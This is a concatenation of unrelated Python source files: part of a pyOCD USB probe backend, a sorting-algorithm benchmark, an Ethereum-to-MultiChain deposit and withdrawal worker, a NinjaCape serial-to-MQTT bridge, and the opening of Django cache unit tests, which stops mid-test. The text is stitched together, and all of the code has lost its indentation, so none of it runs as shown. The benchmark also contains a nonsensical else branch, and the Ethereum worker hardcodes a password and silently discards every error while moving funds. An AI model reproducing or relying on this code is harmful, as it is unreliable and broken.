USB_CLASS_HID,
filter_device_by_class,
is_known_cmsis_dap_vid_pid,
check_ep,
)
from ..dap_access_api import DAPAccessIntf
from ... import common
LOG = logging.getLogger(__name__)
try:
import usb.core
import usb.util
except:
if platform.system() == "Linux":
LOG.error("PyUSB is required for CMSIS-DAP support on Linux")
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
class PyUSB(Interface):
"""! @brief CMSIS-DAP USB interface class using pyusb for the backend.
"""
isAvailable = IS_AVAILABLE
did_show_no_libusb_warning = False
def __init__(self):
super(PyUSB, self).__init__()
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rcv_data = []
self.read_sem = threading.Semaphore(0)
self.packet_size = 64
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=FindDap(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" % self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get count of HID interfaces and create the matcher object
hid_interface_count = len(list(usb.util.find_descriptor(config, find_all=True, bInterfaceClass=USB_CLASS_HID)))
matcher = MatchCmsisDapv1Interface(hid_interface_count)
# Get CMSIS-DAPv1 interface
interface = usb.util.find_descriptor(config, custom_match=matcher)
if interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no CMSIS-DAPv1 interface" %
self.serial_number)
interface_number = interface.bInterfaceNumber
# Find endpoints
ep_in, ep_out = None, None
for endpoint in interface:
if endpoint.bEndpointAddress & usb.util.ENDPOINT_IN:
ep_in = endpoint
else:
ep_out = endpoint
# Detach kernel driver
self.kernel_driver_was_attached = False
try:
if dev.is_kernel_driver_active(interface_number):
LOG.debug("Detaching Kernel Driver of Interface %d from USB device (VID=%04x PID=%04x).", interface_number, dev.idVendor, dev.idProduct)
dev.detach_kernel_driver(interface_number)
self.kernel_driver_was_attached = True
except (NotImplementedError, usb.core.USBError) as e:
# Some implementations don't have kernel attach/detach
LOG.warning("USB Kernel Driver Detach Failed ([%s] %s). Attached driver may interfere with pyOCD operations.", e.errno, e.strerror)
pass
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.dev = dev
self.intf_number = interface_number
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
try:
while not self.closed:
self.read_sem.acquire()
if not self.closed:
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""! @brief Returns all the connected CMSIS-DAP devices.
returns an array of PyUSB (Interface) objects
"""
# find all cmsis-dap devices
try:
all_devices = usb.core.find(find_all=True, custom_match=FindDap())
except usb.core.NoBackendError:
if not PyUSB.did_show_no_libusb_warning:
LOG.warning("CMSIS-DAPv1 probes may not be detected because no libusb library was found.")
PyUSB.did_show_no_libusb_warning = True
return []
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSB()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""! @brief Write data on the OUT endpoint associated to the HID interface
"""
report_size = self.packet_size
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
if not self.ep_out:
bmRequestType = 0x21 #Host to device request of type Class of Recipient Interface
bmRequest = 0x09 #Set_REPORT (HID class-specific request for transferring data over EP0)
wValue = 0x200 #Issuing an OUT report
wIndex = self.intf_number #mBed Board interface number for HID
self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
return
self.ep_out.write(data)
def read(self):
"""! @brief Read data on the IN endpoint associated to the HID interface
"""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited" %
self.serial_number)
return self.rcv_data.pop(0)
def close(self):
"""! @brief Close the interface
"""
assert self.closed is False
LOG.debug("closing interface")
self.closed = True
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
usb.util.release_interface(self.dev, self.intf_number)
if self.kernel_driver_was_attached:
try:
self.dev.attach_kernel_driver(self.intf_number)
except Exception as exception:
LOG.warning('Exception attaching kernel driver: %s',
str(exception))
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.kernel_driver_was_attached = False
self.thread = None
class MatchCmsisDapv1Interface(object):
"""! @brief Match class for finding CMSIS-DAPv1 interface.
This match class performs several tests on the provided USB interface descriptor, to
determine whether it is a CMSIS-DAPv1 interface. These requirements must be met by the
interface:
1. If there is more than one HID interface on the device, the interface must have an interface
name string containing "CMSIS-DAP".
2. bInterfaceClass must be 0x03 (HID).
3. bInterfaceSubClass must be 0.
4. Must have interrupt in endpoint, with an optional interrupt out endpoint, in that order.
"""
def __init__(self, hid_interface_count):
"""! @brief Constructor."""
self._hid_count = hid_interface_count
def __call__(self, interface):
"""! @brief Return True if this is a CMSIS-DAPv1 interface."""
try:
if self._hid_count > 1:
interface_name = usb.util.get_string(interface.device, interface.iInterface)
# This tells us whether the interface is CMSIS-DAP, but not whether it's v1 or v2.
if (interface_name is None) or ("CMSIS-DAP" not in interface_name):
return False
# Now check the interface class to distinguish v1 from v2.
if (interface.bInterfaceClass != USB_CLASS_HID) \
or (interface.bInterfaceSubClass != 0):
return False
# Must have either 1 or 2 endpoints.
if interface.bNumEndpoints not in (1, 2):
return False
# Endpoint 0 must be interrupt in.
if not check_ep(interface, 0, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_INTR):
return False
# Endpoint 1 is optional. If present it must be interrupt out.
if (interface.bNumEndpoints == 2) \
and not check_ep(interface, 1, usb.util.ENDPOINT_OUT, usb.util.ENDPOINT_TYPE_INTR):
return False
# All checks passed, this is a CMSIS-DAPv1 interface!
return True
except (UnicodeDecodeError, IndexError):
# UnicodeDecodeError exception can be raised if the device has a corrupted interface name.
# Certain versions of STLinkV2 are known to have this problem. If we can't read the
# interface name, there's no way to tell if it's a CMSIS-DAPv2 interface.
#
# IndexError can be raised if an endpoint is missing.
return False
class FindDap(object):
"""! @brief CMSIS-DAP match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""! @brief Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""! @brief Return True if this is a DAP device, False otherwise"""
# Check if the device class is a valid one for CMSIS-DAP.
if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
return False
try:
# First attempt to get the active config. This produces a more direct error
# when you don't have device permissions on Linux
config = dev.get_active_configuration()
# Now read the product name string.
device_string = dev.product
if (device_string is None) or ("CMSIS-DAP" not in device_string):
return False
# Get count of HID interfaces.
hid_interface_count = len(list(usb.util.find_descriptor(config, find_all=True, bInterfaceClass=USB_CLASS_HID)))
# Find the CMSIS-DAPv1 interface.
matcher = MatchCmsisDapv1Interface(hid_interface_count)
cmsis_dap_interface = usb.util.find_descriptor(config, custom_match=matcher)
except usb.core.USBError as error:
if error.errno == errno.EACCES and platform.system() == "Linux":
msg = ("%s while trying to interrogate a USB device "
"(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
"See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
(error, dev.idVendor, dev.idProduct))
# If we recognize this device as one that should be CMSIS-DAP, we can raise
# the level of the log message since it's almost certainly a permissions issue.
if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
LOG.warning(msg)
else:
LOG.debug(msg)
else:
LOG.debug("Error accessing USB device (VID=%04x PID=%04x): %s",
dev.idVendor, dev.idProduct, error)
return False
except (IndexError, NotImplementedError, ValueError, UnicodeDecodeError) as error:
LOG.debug("Error accessing USB device (VID=%04x PID=%04x): %s", dev.idVendor, dev.idProduct, error)
return False
if cmsis_dap_interface is None:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
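# Example usage (a sketch mirroring get_all_connected_interfaces() above):
#   usb.core.find(find_all=True, custom_match=FindDap()) yields every CMSIS-DAPv1 probe,
#   while usb.core.find(custom_match=FindDap(serial=probe_serial)) matches only the probe
#   with that serial number (probe_serial being a hypothetical serial string).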
|
main.py
|
import sys
sys.path.append('..')
from data.generate_data import GenerateData
from threading import Thread
from copy import deepcopy
import ast
import os
from bubble_sort import BubbleSort
from bucket_sort import BucketSort
from heap_sort import HeapSort
from merge_sort import MergeSort
from quick_sort import QuickSort
import time
BUBBLE_SORT = True
BUCKET_SORT = True
HEAP_SORT = True
MERGE_SORT = True
QUICK_SORT = True
def write_result(): pass
def fn_bubble_sort(input, output, start):
bubb_sort = BubbleSort()
bubb_sort.bubble_sort(input)
assert input == output
end = time.time()
def fn_bucket_sort(input, output, start):
buck_sort = BucketSort()
buck_sort.bucket_sort(input)
assert input == output
end = time.time()
def fn_heap_sort(input, output, start):
heap_sort = HeapSort()
heap_sort.heap_sort(input)
assert input == output
end = time.time()
def fn_merge_sort(input, output, start):
m_sort = MergeSort()
m_sort.merge_sort(input)
assert input == output
end = time.time()
def fn_quick_sort(input, output, start):
q_sort = QuickSort()
q_sort.quick_sort(0, len(input) - 1, input)
assert input == output
end = time.time()
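# Each fn_*_sort above records end = time.time() but never reports it. A minimal timing
# wrapper sketch (the print format is an assumption):
def timed_sort(fn, input_data, output_data):
    start = time.time()
    fn(input_data, output_data, start)
    print(f'{fn.__name__}: {time.time() - start:.4f}s')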
def main(size, input, output, thread_name):
fn_sorts = []
if BUBBLE_SORT:
fn_sorts.append(fn_bubble_sort)
if BUCKET_SORT:
fn_sorts.append(fn_bucket_sort)
if HEAP_SORT:
fn_sorts.append(fn_heap_sort)
if MERGE_SORT:
fn_sorts.append(fn_merge_sort)
if QUICK_SORT:
fn_sorts.append(fn_quick_sort)
start = time.time()
for (i_data, o_data) in zip(input, output):
i_data, o_data = ast.literal_eval(i_data), ast.literal_eval(o_data)
for i in range(len(fn_sorts)):
fn_sorts[i](deepcopy(i_data), deepcopy(o_data), time.time())
end = time.time()
print('----------------', thread_name, ' done', '----------------')
print(f'total time: {end - start}s')
if __name__ == '__main__':
count, sizes = 1, [45, 100, 1000]
for size in sizes:
read_training = f'../data/numeric/{size}/train_dataset.csv'
input, output = GenerateData.read_dataset(read_training)
thread_name = f'thread-{count}'
thread = Thread(target=main, args=(size, input, output, thread_name), name=thread_name)
print('----------------', thread_name, ' starting', '----------------')
thread.start()
count += 1
else:
sizes = [45, 100, 1000]
for size in sizes:
read_training = f'./data/numeric/{size}/train_dataset.csv'
input, output = GenerateData.read_dataset(read_training)
# main() literal_evals each row itself, so pass the raw string lists straight through
main(size, input, output, f'size-{size}')
|
eth_workers.py
|
from web3 import Web3, HTTPProvider
from Savoir import Savoir
from requests import post
from threading import Thread
import time
import json
from conf import *
#### Note: on deposit a small error occurs - the tx fee (it is subtracted when forwarding funds to the coinbase below)
if __name__ == "__main__":
eth = Web3(HTTPProvider("http://localhost:"+eport)) # run geth with: geth --rpcapi personal,web3,eth --rpc
versum = Savoir(muser, \
mpassword, \
"localhost", mport, \
mchainname)
url = publicserver+"/eth/"
def refill_raddresses():
"""
Ensures that always deposit addresses are available in the Database
"""
while True:
try:
data = json.dumps({"password":publicserverpassword})
r = post(url + "len/raddress", data).text
if int(r) < 100:
raddress = eth.personal.newAccount("versumtestchain") #some password, because it's required by ethereum
data = json.dumps({"password":publicserverpassword,\
"raddress": raddress})
r = post(url + "set/raddress", data).text
except:
pass
time.sleep(60)
def deposit_worker():
"""
Check every address in database for deposits and executes them
"""
while True:
try:
data = json.dumps({"password":publicserverpassword})
r = post(url + "get/depositdata", data).json()
address_data = r["data"]
for pair in address_data:
raddress = pair[0]
vaddress = pair[1]
value = eth.eth.getBalance(str(raddress))
if value > 0:
data = json.dumps({"raddress": raddress,\
"password":publicserverpassword})
r = post(url + "del/depositdata", data).text
if r == "Success":
print versum.issuemore(vaddress, "ETH", round(eth.fromWei(value,'ether'),7))
print eth.personal.sendTransaction(\
{'to': eth.eth.coinbase,\
'from': raddress, 'value': value-200000000000000}, 'versumtestchain')
except:
pass
time.sleep(60)
def refill_vaddresses():
"""
Ensures that always enough withdraw addresses are available
"""
while True:
try:
data = json.dumps({"password":publicserverpassword})
r = post(url + "len/vaddress", data).text
if int(r) < 100:
vaddress = versum.getnewaddress()
versum.grant(vaddress, "send")
versum.grant(vaddress, "receive")
data = json.dumps({"password":publicserverpassword,\
"vaddress": vaddress})
r = post(url + "set/vaddress", data).text
except:
pass
time.sleep(60)
def withdraw_worker():
"""
Checks every address in database for withdrawals and executes them.
Afterward burns assets
"""
while True:
try:
data = json.dumps({"password":publicserverpassword})
r = post(url + "get/withdrawdata", data).json()
address_data = r["data"]
for pair in address_data:
raddress = pair[1]
vaddress = pair[0]
value_list = versum.getaddressbalances(vaddress)
for asst in value_list:
if asst["name"] == "ETH":
value = float(asst["qty"])
if value > 0:
data = json.dumps({"vaddress": vaddress,\
"password":publicserverpassword})
r = post(url + "del/withdrawdata", data).text
if r == "Success":
print eth.personal.sendTransaction(\
{'to': raddress,\
'from': eth.eth.coinbase, 'value': eth.toWei(value, "ether")-100000000000000}, 'versumtestchain')
print versum.sendassetfrom(vaddress, \
"1XXXXXXXKhXXXXXXTzXXXXXXY6XXXXXXX5UtyF",\
"ETH", value)
except:
pass
time.sleep(60)
def run_all():
Thread(target=refill_raddresses).start()
Thread(target=deposit_worker).start()
Thread(target=refill_vaddresses).start()
Thread(target=withdraw_worker).start()
run_all()
|
ninjaCapeSerialMQTTBridge.py
|
#!/usr/bin/python
#
# used to interface the NinjaCape to openHAB via MQTT
# - reads data from serial port and publishes on MQTT client
# - writes data to serial port from MQTT subscriptions
#
# - uses the Python MQTT client from the Mosquitto project http://mosquitto.org (now in Paho)
#
# https://github.com/perrin7/ninjacape-mqtt-bridge
# perrin7
import serial
import paho.mqtt.client as mqtt
import os
import json
import threading
import time
### Settings
serialdev = '/dev/ttyO1' # for BBB
# serialdev = '/dev/ttyAMA0' # for RPi
broker = "127.0.0.1" # mqtt broker
port = 1883 # mqtt broker port
debug = False ## set this to True for lots of prints
# buffer of data to output to the serial port
outputData = []
#### MQTT callbacks
def on_connect(client, userdata, flags, rc):
if rc == 0:
#rc 0 successful connect
print "Connected"
else:
raise Exception("MQTT connection failed, rc=%d" % rc)
#subscribe to the output MQTT messages
output_mid = client.subscribe("ninjaCape/output/#")
def on_publish(client, userdata, mid):
if(debug):
print "Published. mid:", mid
def on_subscribe(client, userdata, mid, granted_qos):
if(debug):
print "Subscribed. mid:", mid
def on_message_output(client, userdata, msg):
if(debug):
print "Output Data: ", msg.topic, "data:", msg.payload
#add to outputData list
outputData.append(msg)
def on_message(client, userdata, message):
if(debug):
print "Unhandled Message Received: ", message.topic, message.paylod
#called on exit
#close serial, disconnect MQTT
def cleanup():
print "Ending and cleaning up"
ser.close()
mqttc.disconnect()
def mqtt_to_JSON_output(mqtt_message):
topics = mqtt_message.topic.split('/')
## JSON message in ninjaCape form
json_data = '{"DEVICE": [{"G":"0","V":0,"D":' + topics[2] + ',"DA":"' + mqtt_message.payload + '"}]}'
return json_data
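# Example of the mapping above (device id and payload are hypothetical): an MQTT message on
# topic "ninjaCape/output/1007" with payload "00FF00" becomes
# '{"DEVICE": [{"G":"0","V":0,"D":1007,"DA":"00FF00"}]}'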
#thread for reading serial data and publishing to MQTT client
def serial_read_and_publish(ser, mqttc):
ser.flushInput()
while True:
line = ser.readline() # this is blocking
if(debug):
print "line to decode:",line
# split the JSON packet up here and publish on MQTT
json_data = json.loads(line)
if(debug):
print "json decoded:",json_data
try:
device = str( json_data['DEVICE'][0]['D'] )
data = str( json_data['DEVICE'][0]['DA'] )
mqttc.publish("ninjaCape/input/"+device, data)
except(KeyError):
# TODO should probably do something here if the data is malformed
pass
############ MAIN PROGRAM START
try:
print "Connecting... ", serialdev
#connect to serial port
ser = serial.Serial(serialdev, 9600, timeout=None) #timeout 0 for non-blocking. Set to None for blocking.
except:
print "Failed to connect serial"
#unable to continue with no serial input
raise SystemExit
try:
#create an mqtt client
mqttc = mqtt.Client("ninjaCape")
#attach MQTT callbacks
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
mqttc.on_message = on_message
mqttc.message_callback_add("ninjaCape/output/#", on_message_output)
#connect to broker
mqttc.connect(broker, port, 60)
# start the mqttc client thread
mqttc.loop_start()
serial_thread = threading.Thread(target=serial_read_and_publish, args=(ser, mqttc))
serial_thread.daemon = True
serial_thread.start()
while True: # main thread
#writing to serial port if there is data available
if( len(outputData) > 0 ):
#print "***data to OUTPUT:",mqtt_to_JSON_output(outputData[0])
ser.write(mqtt_to_JSON_output(outputData.pop()))
time.sleep(0.5)
# handle app closure
except (KeyboardInterrupt):
print "Interrupt received"
cleanup()
except (RuntimeError):
print "uh-oh! time to die"
cleanup()
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import tempfile
import threading
import time
import unittest
from unittest import mock
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
with self.assertWarns(CacheKeyWarning, msg=KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces'):
cache.delete_many({'key with spaces': 'foo'})
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertEqual(cache.get_or_set('mykey', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test-specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
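# For example, caches_setting_for_tests(BACKEND='django.core.cache.backends.db.DatabaseCache',
# LOCATION='test cache table') yields one DatabaseCache configuration per alias in
# _caches_setting_base, which is how DBCacheTests below builds its CACHES override.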
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_default_used_when_none_is_set(self):
"""If None is cached, get() returns it instead of the default."""
cache.set('key_default_none', None)
self.assertIsNone(cache.get('key_default_none', default='default'))
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
